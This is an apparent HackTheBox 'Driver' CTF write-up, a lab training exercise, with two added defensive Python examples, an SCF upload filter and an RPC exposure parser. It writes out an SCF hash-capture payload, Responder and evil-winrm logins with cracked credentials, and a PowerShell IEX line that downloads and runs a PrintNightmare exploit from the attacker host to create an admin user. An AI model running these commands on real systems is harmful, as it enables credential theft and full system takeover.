Today we come with another challenge from HackTheBox, called "Driver", which is based on exploiting the PrintNightmare vulnerability. So without wasting time, let's start the journey.
Level : Medium
Attacking Strategy
- Network Scanning
- Nmap
- Enumeration
- Web application enumeration
- Upload functionality
- Exploitation
- SCF attack
- Privilege Escalation
- Print Nightmare Vulnerability
Walkthrough
IP Addresses : 10.10.11.106
We start with an Nmap scan, which reveals the open ports and services on the target: here port 80 (HTTP), 445 (SMB) and 5985 (WinRM, Windows Remote Management) are open.
nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.093s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h30m00s, deviation: 0s, median: 1h30m00s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-17T18:59:32
|_ start_date: 2021-10-17T12:44:47
Enumeration
Port 80 looks interesting as there is some kind of authentication; after visiting the HTTP service there is a pop-up asking for a password to access the service.

Now we don't have any username or password, so the first thing that comes to mind is brute force, but then we think let's try some default credentials first, and it worked: the valid credentials are "admin:admin" and we are in.

After logging in successfully we continue the enumeration. After some time we find an option to upgrade the firmware, which comes with upload functionality, so we try to upload some shells but with no success. However, an interesting message is shown when we submit, i.e. the payload was submitted successfully.

Exploitation
For some time we are stuck here, but after taking a break we come up with a theory: can we try an SCF attack, since the SMB service is also running? To perform this attack we have to create a file with the .scf extension and write the following into it.
Note: change the IP address to your attacker IP.
[Shell]
Command=2
IconFile=\\10.10.14.94\Share\test.ico
[Taskbar]
Command=ToggleDesktop
Once the payload is ready we upload it to the server, and we have to run Responder to grab the hash.
responder -I tun0
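The reason the upload works is that the firmware update page accepts any file and drops it where a user later browses the folder; Explorer renders the SCF's IconFile path and authenticates to whatever host it names. As an added defensive example, not part of the original writeup, the following Python upload filter parses an SCF file as the INI-style text it is and blocks any whose IconFile is a UNC path to a host outside an allow-list. The two SCF samples are constructed (the first is the payload shown above), and the trusted-host set is an assumption for the example.

```python
import configparser
import re
from typing import Optional, Set

# Constructed sample: the SCF payload from the writeup, as the upload endpoint would receive it.
MALICIOUS_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.94\Share\test.ico
[Taskbar]
Command=ToggleDesktop
"""

# Constructed sample: a benign SCF whose icon is a local resource (no network path).
BENIGN_SCF = r"""[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""

# \\host\share\...: the first path component after the double backslash is the host.
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")


def icon_target_host(scf_text: str) -> Optional[str]:
    """Return the host named by a UNC IconFile path, or None when the icon is local."""
    parser = configparser.ConfigParser(interpolation=None)  # SCF is plain INI syntax
    parser.read_string(scf_text)
    icon = parser.get("Shell", "IconFile", fallback="").strip()
    match = UNC_HOST_RE.match(icon)
    return match.group(1) if match else None


def classify_scf_upload(scf_text: str, trusted_hosts: Set[str]) -> dict:
    """Decide whether an uploaded SCF may be stored on a browsable share.

    Unparseable input is blocked too: a filter that fails open on odd encodings
    is exactly what an attacker would probe for.
    """
    try:
        host = icon_target_host(scf_text)
    except configparser.Error as exc:
        return {"verdict": "block", "host": None, "reason": f"unparseable SCF: {exc}"}
    if host is None:
        return {"verdict": "allow", "host": None, "reason": "IconFile is a local resource"}
    if host.lower() in {h.lower() for h in trusted_hosts}:
        return {"verdict": "allow", "host": host, "reason": "IconFile on an approved file server"}
    return {
        "verdict": "block",
        "host": host,
        "reason": "IconFile would make Explorer authenticate to an untrusted SMB host",
    }


if __name__ == "__main__":
    # Hypothetical allow-list of internal file servers; assumption for the example.
    trusted = {"fileserver.corp.local"}
    for name, sample in (("malicious", MALICIOUS_SCF), ("benign", BENIGN_SCF)):
        print(name, classify_scf_upload(sample, trusted))
```

The same check applies to other icon-bearing formats Explorer renders on sight (.url and .lnk files), and on the host side the complementary control is blocking outbound SMB (TCP 445) at the perimeter so that a planted UNC path has nowhere to authenticate to.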

And here we get the hash for the user tony. After cracking the hash we get the password for tony, and now we have a valid username and password, i.e. "tony:liltony".

With these credentials we log in over WinRM (port 5985) and collect the user flag.
evil-winrm -i 10.10.11.106 -u tony -p liltony

Privilege Escalation
Let's utilize the credentials we enumerated for user tony, but we don't get anything from them directly. After some time we start enumerating the SMB service and other services, and we get something juicy: the Print System Remote Protocol (MS-RPRN) is exposed, so we can try exploiting the PrintNightmare vulnerability, also known as the Windows Print Spooler Remote Code Execution Vulnerability as Microsoft defines it.
rpcdump.py @10.10.11.106 | grep MS-RPRN
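Grepping for MS-RPRN only tells you the interface is registered; what matters for exposure is whether its bindings include a network transport (ncacn_ip_tcp or ncacn_np) rather than only the local ncalrpc one. As an added example, not part of the original writeup, this Python parser reads rpcdump.py-style output and reports that distinction, so the same check can run across a fleet's saved dumps. The sample text is constructed in the layout impacket's rpcdump prints, not captured from the box; the MS-RPRN UUID is the interface's documented identifier.

```python
import re
from typing import Dict, List

# Interface UUID of the Print System Remote Protocol (MS-RPRN), served by spoolsv.exe.
MS_RPRN_UUID = "12345678-1234-abcd-ef00-0123456789ab"

# Transports reachable from another host; ncalrpc is local-only.
REMOTE_TRANSPORTS = ("ncacn_ip_tcp", "ncacn_np", "ncacn_http")

# Constructed sample in rpcdump.py's layout (values are illustrative, not from the box).
SAMPLE_RPCDUMP = """\
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.10.11.106[49668]
          ncalrpc:[LRPC-constructed-example]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.10.11.106[49664]
"""


def parse_rpcdump(text: str) -> List[Dict]:
    """Split rpcdump output into endpoint records with protocol, uuid and bindings."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"protocol": None, "uuid": None, "bindings": []}
        for raw in block.splitlines():
            line = raw.strip()
            if line.startswith("Protocol:"):
                rec["protocol"] = line.split(":", 1)[1].strip()
            elif line.startswith("UUID"):
                # "UUID    : <uuid> v1.0" -> keep the uuid, drop the version, normalise case
                rec["uuid"] = line.split(":", 1)[1].strip().split()[0].lower()
            elif line and ":" in line and not line.startswith(("Provider", "Bindings")):
                rec["bindings"].append(line)  # e.g. ncacn_ip_tcp:10.10.11.106[49668]
        records.append(rec)
    return records


def spooler_exposure(text: str) -> Dict:
    """Report whether MS-RPRN is registered and reachable over a network transport."""
    for rec in parse_rpcdump(text):
        if rec["uuid"] == MS_RPRN_UUID:
            remote = [b for b in rec["bindings"] if b.startswith(REMOTE_TRANSPORTS)]
            return {"registered": True, "remote_bindings": remote, "reachable": bool(remote)}
    return {"registered": False, "remote_bindings": [], "reachable": False}


if __name__ == "__main__":
    print(spooler_exposure(SAMPLE_RPCDUMP))
```

A host where the spooler shows up only on ncalrpc, or not at all, is not a PrintNightmare target over the network; on servers that do not need to print, stopping and disabling the Print Spooler service removes the interface entirely, which is the mitigation Microsoft pairs with the patch.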

To exploit this vulnerability we are going to use a PowerShell-based exploit available on GitHub. This exploit creates a new user with local administrator privileges.
git clone https://github.com/calebstewart/CVE-2021-1675.git
cd CVE-2021-1675
python -m SimpleHTTPServer
IEX(New-Object Net.WebClient).downloadstring('http://10.10.14.81:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "pentestsky" -Newpassword "pentestsky"
evil-winrm -i 10.10.11.106 -u pentestsky -p pentestsky
type "C:\Users\Administrator\Desktop\root.txt"

Finally we are administrator and collect the root flag.
References
- SMB Share – SCF File Attacks – Penetration Testing Lab
- CVE-2021-1675 – Security Update Guide – Microsoft – Windows Print Spooler Remote Code Execution Vulnerability
- GitHub – calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)